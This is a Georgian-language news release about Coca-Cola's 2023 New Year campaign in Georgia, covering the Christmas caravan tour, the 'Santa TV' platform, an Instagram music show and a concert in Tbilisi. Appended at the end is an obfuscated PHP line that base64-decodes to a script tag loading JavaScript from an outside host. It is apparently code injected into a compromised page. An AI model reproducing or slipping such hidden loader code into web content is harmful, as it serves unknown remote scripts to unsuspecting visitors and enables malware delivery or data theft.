celsiusi
ავერსი საქკაბელი

 დღესასწაულები გვიახლოვდება და Coca-Cola ამას ტრადიციულად,განსაკუთრებული საახალწლო კამპანიის დაწყებით აღნიშნავს. კოკა-კოლას 2023 წლის სადღესასწაულო კამპანიის სლოგანია - „მსოფლიოს სჭირდება მეტი სანტა“.

Coca-Cola-ს საშობაო ქარავნის მსვლელობა კი დღეს, რამდენიმე საათში დედაქალაქიდან დაიწყება და 30 დეკემბრის ჩათვლით ჯადოსნურ განწყობას საქართველოს ყველა ქალაქში მიიტანს.

„წლევანდელი საახალწლო კამპანიის ფილოსოფიური დატვირთვა ეხმაურება ყველა ჩვენგანის "შინაგან სანტას" - დიდი ხნის ნანატრ, სადღესასწაულო იდეის ძირითად თემას, რომელიც ხაზს უსვამს შობის სიკეთეს, იმედისა და ოპტიმიზმის გზავნილებს.

საახალწლო სამზადისი თანდათან იკრებს ძალას. Coca-Cola წლევანდელ სადღესასწაულო კამპანიას, რომელიც ყველა ჩვენგანში სანტას სულისკვეთებას აღვიძებს, გახსნილად აცხადებს და სადღესასწაულო სეზონის განწყობას ქმნის ისე, როგორც ეს მხოლოდ კოკა-კოლას შეუძლია. ბევრისთვის ლეგენდარული კოკა-კოლას საშობაო ქარავნის ხილვა, საახალწლო სეზონის დაწყებას ნიშნავს“, - აცხადებენ კომპანიაში.

წელს პირველად კოკა-კოლას ისტორიაში, შეიქმნა სპეციალური საახალწლო ციფრული პლატფორმა “Santa TV”, სადაც კოკა-კოლას საახალწლო კამპანიის და საშობაო ქარავნის მოგზაურობის სადღესასწაულო აქტივობების დაანონსება ხდება:

6 დეკემბრიდან, მხოლოდ ამ ზამთარს, ექსკლუზიურად, მხოლოდ ჩვენს "ინსტაგრამ" არხზე ჯადოსნური საახალწლო შოუ კოკა-კოლასგან სახელად „Guess The Santa Music Show“. დაელოდეთ თქვენს საყვარელ საახალწლო სიმღერებს ჩვენს გვერდზე და ამოიცანით ვინ იმალება კოკა-კოლას სანტების მიღმა! არ გამოტოვოთ ჯადოსნური დღესასწაული!

საახალწლო განწყობის შესაქმნელად დედაქალაქის ისტორიულ უბნებსა და ცენტრალურ ქუჩებზე დამონტაჟებული არასტანდარტული კონსტრუქციები, ავტობუსის გაჩერებები 3D ეკრანი და „საახალწლო სოფელი“, რომელიც დედაენის ბაღის ტერიტორიას მოიცავს.

საქართველოში პირველი მუსიკალური საღამო ქარავანზე 20 დეკემბერს, 22:00 საათზე, ევროპის მოედანზე გაიმართება. იგრძენით დღესასწაულის ჯადოსნურობა კოკა-კოლასთან ერთად.

„სანტა, დაუვიწყარი სიმღერა და კოკა-კოლას საშობაო ქარავნის მოგზაურობა უკვე ყველასთვის საყვარელ ტრადიციად იქცა, რომელსაც ელოდება ყველა ადამიანი განურჩევლად ასაკისა და ყველას დღესასწაულის ჯადოსნურ განწყობას შეაგრძნობინებს. კოკა-კოლა არსებობის მანძილზე ისწრაფვის გააუმჯობესოს საზოგადოების ცხოვრება, ამიტომ ჩვენ ვიმედოვნებთ, რომ ამ კამპანიით გავაღვიძებთ სადღესასწაულო სულისკვეთებას და შევახსენებთ ყველას, რომ სიკეთის და ოპტიმიზმის გზავნილებს შეუძლია გული გაუთბოს ადამიანებს და გააერთიანოს ისინი.

უკვე დროა, ავაციმციმოთ სახლები, დროა მოვიმარაგოთ წითელი ბოთლები და როცა ყველაზე მნიშვნელოვანი 00:00 საათი დადგება განვიახლოთ განწყობა, შევქმნათ ჯადოსნური მომენტები და შევიგრძნოთ ახალი წლის ჯადოსნური გემო ერთად“, - აცხადებენ კომპანიაში.

ცნობისთვის, თითქმის სამი ათეული წლის განმავლობაში - მას შემდეგ, რაც 90-იანი წლების შუა პერიოდში პატარა ეკრანი პირველად განათდა კოკა-კოლას საახალწლო რეკლამით, საშობაო ქარავანი მთელ მსოფლიოსა და საქართველოში სადღესასწაულო სეზონის მთავარ, ძლიერ და რეალურ სიმბოლოდ იქცა.

კოკა-კოლა გილოცავთ დამდეგ შობა-ახალ წელს!

407
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");